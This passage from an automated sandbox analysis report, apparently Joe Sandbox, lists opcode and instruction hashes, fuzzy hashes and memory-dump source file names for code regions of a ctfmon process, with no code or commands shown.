                  • Instruction Fuzzy Hash: 8861EB31D1995D9FEB98EB58D8A57B8B7B1FF68340F1441BAD00DE7296CB396880CB04
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fdd707e8206c2641e32ff79ab955f102adaefa36bb701201ef15101e544540d
                  • Instruction ID: 986eb0636275fd0955e0c2dc14e4e4f822b651aaf29774e1d04a10e84304d690
                  • Opcode Fuzzy Hash: 0fdd707e8206c2641e32ff79ab955f102adaefa36bb701201ef15101e544540d
                  • Instruction Fuzzy Hash: AA51693091D68A8FEB54EF64C8592FEBBE0FF19340F00467AE809D21C2DB78A554CB85
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fab3c53c6d9653050fc30d52131a77bc37b34b412d32a01edfdb99ad5c547687
                  • Instruction ID: 8b90d802bcfa705d880816f255d51f19de6e0272bf41eb309b237b31ace2861b
                  • Opcode Fuzzy Hash: fab3c53c6d9653050fc30d52131a77bc37b34b412d32a01edfdb99ad5c547687
                  • Instruction Fuzzy Hash: 02614D70D0D65A8FEBA5AB6488197B9BBB0FF15380F0041BAD41DD21D3DF3C69848B46
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f33b46f6e2e2ee536593e83bcee26192f87f3a5fa620d1e3bb9838e82666934a
                  • Instruction ID: a40e246c260de2a8078b08e12de65338644e970f91d7905a09f03ba0469dfb92
                  • Opcode Fuzzy Hash: f33b46f6e2e2ee536593e83bcee26192f87f3a5fa620d1e3bb9838e82666934a
                  • Instruction Fuzzy Hash: C2516A3090D78E8FEB95EF2488592EABBF0FF56344F0405BAD809C7192EB38A9548745
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b11acd0fc24f4d8ad269165f1831b81033643e9f0488cf3ba4970d7cc013188a
                  • Instruction ID: 86b1e21d9091a8fdc4901d8a0aa1def97fdd6fdf3bfcd69e0c59e4d71f392254
                  • Opcode Fuzzy Hash: b11acd0fc24f4d8ad269165f1831b81033643e9f0488cf3ba4970d7cc013188a
                  • Instruction Fuzzy Hash: 28511370D086198FEB54EBA8C494AEDBBB1EF68751F50013AD009E72D2DB38A944CB58
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f42af7f2c3e4628cd82ba8212e17ef275eb42fd909314aac4e312390bdc78ee
                  • Instruction ID: 41bbc9a86af96e92b2da1730ccd14c1f55752a2f8360d9b364013d936802f9cf
                  • Opcode Fuzzy Hash: 5f42af7f2c3e4628cd82ba8212e17ef275eb42fd909314aac4e312390bdc78ee
                  • Instruction Fuzzy Hash: 27519F71C0E6DA9FE796AB2488692B9BBE0FF65345F0404FAD408C61D3EB286548C746
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 645cbd3a1ac42ef69bb7861bb1cdf1b801244275e9153a4598822f93f46d1ac6
                  • Instruction ID: 634dd0105fa26c3b25e89b4923e5adff47a72f7ea5d1e2d996ab309a713d5077
                  • Opcode Fuzzy Hash: 645cbd3a1ac42ef69bb7861bb1cdf1b801244275e9153a4598822f93f46d1ac6
                  • Instruction Fuzzy Hash: 8151EF70C0DA9A9FEB89EB2484692B9BBE0FF69340F0404FAD409C71D7DB38A444C755
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction ID: 823312be5cb8c80a873f4d51dfb19524b8621f1c8eaaf01b8fbdce12c5e45d85
                  • Opcode Fuzzy Hash: 1f201b6b6c4fb925f160123661e955a2414c05bff37d0878437e6876e7e6d152
                  • Instruction Fuzzy Hash: 62515E30D0D5298EEBA4AB5488517FCB6B0FF65750F5042BBD44EB62D2DF782988CB48
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8599b4a3f6738a3abfa2b255e0a3eac83ac233398475024a96043a59040523f2
                  • Instruction ID: 892decaf0ddc8dd98df0ab85f75c60ad4cf38ca53be0006cba215f94b782a67e
                  • Opcode Fuzzy Hash: 8599b4a3f6738a3abfa2b255e0a3eac83ac233398475024a96043a59040523f2
                  • Instruction Fuzzy Hash: EA31C13290D55AAEEB55BB68A4151FD3B60EF617B9F042377D508DA0C3EF3C244182AD
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bfc520e87d3dd9491b990126ac00c80dde1e2113c7b08bbc7784bc78eb60a6d3
                  • Instruction ID: 04ed80659f95df05f3109c26f028c095475ad39fa7cb3241b8475b400f1e5175
                  • Opcode Fuzzy Hash: bfc520e87d3dd9491b990126ac00c80dde1e2113c7b08bbc7784bc78eb60a6d3
                  • Instruction Fuzzy Hash: BB31F2B1D0D98A9FE745EB7858581A97BE0FF25760F0805BBC008DB0D2EF2959868358
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: defcc1532a07a53cdb56b13c1f051743ca1fd6ad54196ccec640560f053e82b9
                  • Instruction ID: ef1e8cbd8dc785c6626c4df24d4a1a89212b61d6f609463f68ac90d46294993a
                  • Opcode Fuzzy Hash: defcc1532a07a53cdb56b13c1f051743ca1fd6ad54196ccec640560f053e82b9
                  • Instruction Fuzzy Hash: 6731D575E1C91D8EEB94EB989895ABCB7B5FF68740F50113AD00DE3282EF3468429B04
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 869a5736fcd19a58f0da54190e5a76ffe6ae567fe3e0ce25a06bafffec226e82
                  • Instruction ID: 95b703a03e4888b3e3a69e053aa2a9c976b8e9829b58b4ddfd933a58e2a9c9ac
                  • Opcode Fuzzy Hash: 869a5736fcd19a58f0da54190e5a76ffe6ae567fe3e0ce25a06bafffec226e82
                  • Instruction Fuzzy Hash: E421F930E1C91D8FEB94FB989895ABCB7B1FF69740F40112AD00DE3282DF3468429B44
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5864dd310dea04db256eb08f33650d1ca229bcdcf15f37c186b3ab51fa820271
                  • Instruction ID: 7b6b48b8b8dad10872034a15cddb894c15214d84514707d1ef6162b8e5607a29
                  • Opcode Fuzzy Hash: 5864dd310dea04db256eb08f33650d1ca229bcdcf15f37c186b3ab51fa820271
                  • Instruction Fuzzy Hash: 9731A071C0E69A8FEB99EF2498292B9BAA0FF65345F0401FAD808C21D7DB286554C746
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f0f22ce739c4788c8d3f17d4293cbd10399a115335aa58276354fbe21102ea4b
                  • Instruction ID: 7403233b407f4df96ac5f6cf088c2a84aaf7e68e0cd55247705f522d3c970fa7
                  • Opcode Fuzzy Hash: f0f22ce739c4788c8d3f17d4293cbd10399a115335aa58276354fbe21102ea4b
                  • Instruction Fuzzy Hash: F4310670D1852A9EEB94EFA4C8447ECB6F1FF68740F1041BAD00DF2292DB7969848F58
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 282f5a196a1cbf26168452e8ccd2ee656392ed45e04b2c27ec64c8bb790caa6e
                  • Instruction ID: f586ea15bd7f6606e5508835e081b8fb64d9976e6c7a01593b4a31e07556dfef
                  • Opcode Fuzzy Hash: 282f5a196a1cbf26168452e8ccd2ee656392ed45e04b2c27ec64c8bb790caa6e
                  • Instruction Fuzzy Hash: 58218630D1DA499EEB49EBA4D8656FDBBB1FF68700F10017AD00AE32D2DB282480CB14
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f50000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf81a3c413382c992c87810f77635b51aea5499c715083ef960f11488db50c11
                  • Instruction ID: 0bfda69268d9a81c78d98a3db5329ea0bbeb90b6266f62edca0a5c7544f0ead7
                  • Opcode Fuzzy Hash: bf81a3c413382c992c87810f77635b51aea5499c715083ef960f11488db50c11
                  • Instruction Fuzzy Hash: F521683190D78E8FEB95BF2488182BABBE1FF56344F0405BAD809D71D2EB78A9448745
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ad6558d2c35af793b2d66a7654682f7034fb4f14e0b7ab324d06c80056ddd0a8
                  • Instruction ID: be20e10f4ad924234a72af27a9f196726b4b8e2b3b26191e8763b8a7d7cebbdb
                  • Opcode Fuzzy Hash: ad6558d2c35af793b2d66a7654682f7034fb4f14e0b7ab324d06c80056ddd0a8
                  • Instruction Fuzzy Hash: 0521CF3190D54A8FF741BB7884492A87BE0EF56780F0404B6D419E70D2EE38A9858365
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f40000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction ID: 44c8513a8fd59466d15f6d545f1e7d993ee75eaaa0ba69f339223c56fae7ee29
                  • Opcode Fuzzy Hash: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction Fuzzy Hash: E231E430D0C5298EEBA4EB54C8547FDB2B4EF64740F4041BAD40EA62D2DF786A88CF18
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ff848f4a000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dce228ae74f1f165a1e4666c7a2ac0899b5223934f07ff3e57c7e4261ab0d0d
                  • Instruction ID: 7a8a351e4962e908a0cdbf84cc8dcc4ed0e55cb5e7c09fde1aec35c1a2f8a3cd
                  • Opcode Fuzzy Hash: 4dce228ae74f1f165a1e4666c7a2ac0899b5223934f07ff3e57c7e4261ab0d0d
                  • Instruction Fuzzy Hash: D521473091854E9FEB89EB68E8586FDBBB0FF29301F1005BBE419E31D2DB3565508B44
                  Memory Dump Source
                  • Source File: 00000012.00000002.2140504441.00007FF848F4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F4A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79f544b2d84474bc9f8c1fbefb1e87a80cc6efbb63b74c26e44356af1b14278e
                  • Instruction ID: bc14b93efe2c43314670c36a49badd1191409a64442791fc99f294b0dc27901b
                  • Opcode Fuzzy Hash: 79f544b2d84474bc9f8c1fbefb1e87a80cc6efbb63b74c26e44356af1b14278e
                  • Instruction Fuzzy Hash: 5281573091D68E8FEB95EF2488592FA7BF0FF59341F0405BBD809D61A2EB38A584C745
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c41a17b8276c09e8defa12c9e30e4e3849a131bc7eb35bf83dc7a25cb913d0b1
                  • Instruction ID: b3fedea4e7ae22a0c77a33e111f74da91d30a30f83610f36e396c989bba1cd47
                  • Opcode Fuzzy Hash: c41a17b8276c09e8defa12c9e30e4e3849a131bc7eb35bf83dc7a25cb913d0b1
                  • Instruction Fuzzy Hash: DA61C031A0CA4A8FDB48EF5898556BA77E1FF98354F10467ED409C32C1CF35A842C789
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f8bfc40892f99e4eb53f69b9e54848ede188596309c93a099f3d0e135acbd122
                  • Instruction ID: 2ade9b2b5a44d41f2da294129dcddbc0c3988314f955724b72000ad7cbbefa2c
                  • Opcode Fuzzy Hash: f8bfc40892f99e4eb53f69b9e54848ede188596309c93a099f3d0e135acbd122
                  • Instruction Fuzzy Hash: BE717B3090DA8A8FEB85EB2888686F97BE0FF19350F1404BBD409D71D2EB78A584C755
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 468a40a4484618b1aec81817d1999b5e64a0486b08d8448c9896fbed82694589
                  • Instruction ID: c343764ee62ff63edc33c38c5bb6bccb8fdea7c38e7efb1931bc820beb60396c
                  • Opcode Fuzzy Hash: 468a40a4484618b1aec81817d1999b5e64a0486b08d8448c9896fbed82694589
                  • Instruction Fuzzy Hash: 2C71793090D68E8FEB99EF2488592BE7BE1FF59340F0405BBD809D7192DB38A584C745
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6499376df9f46bbcdbbee9065e67e4729a64f674ac57516ccf6fd1ebebc64302
                  • Instruction ID: 6fee5bd3387a78a13b3631547e39cff2644c432c0ee202f805d37530f131c1c7
                  • Opcode Fuzzy Hash: 6499376df9f46bbcdbbee9065e67e4729a64f674ac57516ccf6fd1ebebc64302
                  • Instruction Fuzzy Hash: 2C61D63180E78A9FE795BB3898652FA7FB0EF06364F0405BBD448C60D3EF6865488759
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 078431d215c68350dd95181f6d2adb3e66b7282037278609c85be41a75c06e72
                  • Instruction ID: 76bc4715ae8442547be5b04a03aead4a315cc8b110765aa4533f0e55e0f35d59
                  • Opcode Fuzzy Hash: 078431d215c68350dd95181f6d2adb3e66b7282037278609c85be41a75c06e72
                  • Instruction Fuzzy Hash: 3651C470D0D68A8FE751EBB498192FABBF0FF16350F0409BAD408D60D2EB79A544C756
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 582e62edbc87a83b8462e2e80a99edad7bb9328984332bf2eb65c382a59dbe75
                  • Instruction ID: 54e2125065c24bd79e7fb31d1eea52e157e099593bc44532265803a16d278735
                  • Opcode Fuzzy Hash: 582e62edbc87a83b8462e2e80a99edad7bb9328984332bf2eb65c382a59dbe75
                  • Instruction Fuzzy Hash: A5518A3090D68E8FEB56EB7498586B9BBE0FF19341F1548BBD809C60E2EB39E544C711
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1c49f77ea4e576985f290ab15702f8ca422d5f24e18b1e94f85babc81e56f71f
                  • Instruction ID: c1a275a745f442fcad61dddef2651703caff079a4d1a76063f4ee243dfd26467
                  • Opcode Fuzzy Hash: 1c49f77ea4e576985f290ab15702f8ca422d5f24e18b1e94f85babc81e56f71f
                  • Instruction Fuzzy Hash: BA51BD70C1D74E8FE752EB78A8592FA7BA0FF15340F4405BAD408C61E2EB3AA548C716
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c0f1de5d4e7891736d4ccbee648ac0338e546a040d37f1c4719d7b29645a90b4
                  • Instruction ID: bd093696bf23d01e0a2b39237fd0d051b0807ae558b27ee738046cbbcadc413d
                  • Opcode Fuzzy Hash: c0f1de5d4e7891736d4ccbee648ac0338e546a040d37f1c4719d7b29645a90b4
                  • Instruction Fuzzy Hash: 0B418F3080D78A8FEB56AF7498582A97FA0FF16341F0548BBD848C60D2EB39A558C712
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cd5de4198acad57d069c072ec66f636faad629fe570e8cccabd7300ba68f6df2
                  • Instruction ID: 1e5664134d5b448d8a34bc750cec6dc7bc4bea6e2b90e81b244128e85589b9e8
                  • Opcode Fuzzy Hash: cd5de4198acad57d069c072ec66f636faad629fe570e8cccabd7300ba68f6df2
                  • Instruction Fuzzy Hash: 0941CDB0C1E64E8FE751EB68E8592FD7BB0EF15340F44057AD409D21E2EB3AA548C716
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e5794bed75f8c2cd5d27c4a1f25cf5acc7c7cc32bf6eed5f83b9722ed32dcc3
                  • Instruction ID: 6e8157f73e99b1700d09a9eb01ef8fc2ba6129049c64bb281bb4c9e93ef3ca5e
                  • Opcode Fuzzy Hash: 2e5794bed75f8c2cd5d27c4a1f25cf5acc7c7cc32bf6eed5f83b9722ed32dcc3
                  • Instruction Fuzzy Hash: FA312671D0DA9A8FE351EB78A8580E97BE0FF15350F0805BBC008C70D2EF2E54868355
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b69824976fdd3e5d9189a9d7b3823dd878462892a0e3dbdc76b6f568648abaaf
                  • Instruction ID: 36c6ac72103e7281a2fc486ab5fdd7610c707d22c94afa0a4ce16e629eaa539b
                  • Opcode Fuzzy Hash: b69824976fdd3e5d9189a9d7b3823dd878462892a0e3dbdc76b6f568648abaaf
                  • Instruction Fuzzy Hash: 49310832A0D2958FD741BB78E8946E97BB0FF42365F0946B3C148CA093DB3C9049C395
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf18c6c76cccf32e35b1b8d738c782ba9d41d3f7807142d3fc267cce3daabddb
                  • Instruction ID: f4120e4b470ff9ebe74ccaa2a73021554ed122600864347dfa08479c79e3804e
                  • Opcode Fuzzy Hash: cf18c6c76cccf32e35b1b8d738c782ba9d41d3f7807142d3fc267cce3daabddb
                  • Instruction Fuzzy Hash: 7131703081D78E8FEB5AAF7498182F97BA0FF15341F5408BBE809C61D2EB39A558C751
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23d4a2af80d39bf8b3c553b8ef767c0d88bc383bcfd9f4b41bbb190525e1036b
                  • Instruction ID: 3ede0bc2ead8d65cf8e209099d7309e1780d0de0a9eeeb12b92e337915efcce9
                  • Opcode Fuzzy Hash: 23d4a2af80d39bf8b3c553b8ef767c0d88bc383bcfd9f4b41bbb190525e1036b
                  • Instruction Fuzzy Hash: DD319270D0D24E8EEB11EBA898043FEBBE0EF15355F040875D404E61D2DB7AA548CB6A
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ab02f3f283bb0402bc94bd82e308650fad6029c6b804035ec286fb02a544112
                  • Instruction ID: c1535c7b1c7c206a4983130478edb52f8fb8febf945c32a1f69e328e815946aa
                  • Opcode Fuzzy Hash: 2ab02f3f283bb0402bc94bd82e308650fad6029c6b804035ec286fb02a544112
                  • Instruction Fuzzy Hash: 55311670D1852A8FEB94EF94D8847ECB6F1FF48340F9046BAD40DE2291DB7969848F58
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16f30f5b6ad1de2e517472e70e3ddad807002b39e2d53b74ec17606d119adcc8
                  • Instruction ID: 5dcd5be4681809920734f988b210f820d26c954a9193d80ae4c0218544399642
                  • Opcode Fuzzy Hash: 16f30f5b6ad1de2e517472e70e3ddad807002b39e2d53b74ec17606d119adcc8
                  • Instruction Fuzzy Hash: 4F118E3085E78E8FEB59AB7494182F97BA0FF55341F5008BBE809C20D6DB39A558C741
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf07d2e8ed3331ae8bbef3e1d1da0ddf7be21d4825086070c372800fba5d49ec
                  • Instruction ID: 5281548a6eec17bd8a1dee717fe4f69874e5c59b75348e8e42effcc0aa548153
                  • Opcode Fuzzy Hash: cf07d2e8ed3331ae8bbef3e1d1da0ddf7be21d4825086070c372800fba5d49ec
                  • Instruction Fuzzy Hash: AA118F3085D78E9FEB59AB7494082FAB7A4FF05345F50087BE819C10D2DF39A558C741
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aeaa2ea614b0ad83b59993dff2c4c8a784d360ec07a3b58bdc11128b79fd2624
                  • Instruction ID: bbfdf8df7213eea08bb3c2722d01ff6d9af197d53fb2f77c7f346c3468f71c11
                  • Opcode Fuzzy Hash: aeaa2ea614b0ad83b59993dff2c4c8a784d360ec07a3b58bdc11128b79fd2624
                  • Instruction Fuzzy Hash: 9511BC3084DA4D8FDB49EF6494596B97BA1FF59340F9045BED409C30D2DB36B486C748
                  Memory Dump Source
                  • Source File: 00000013.00000002.2160665690.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_19_2_7ff848f20000_ctfmon.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c9ccd575721fe7ce1a04f1233960a6968d81f072c35c875216c52d5b5fc447
                  • Instruction ID: 645c4bbed140f294b15af464c919a3e599884c18fd8ca4dd426c42b5691e8e98
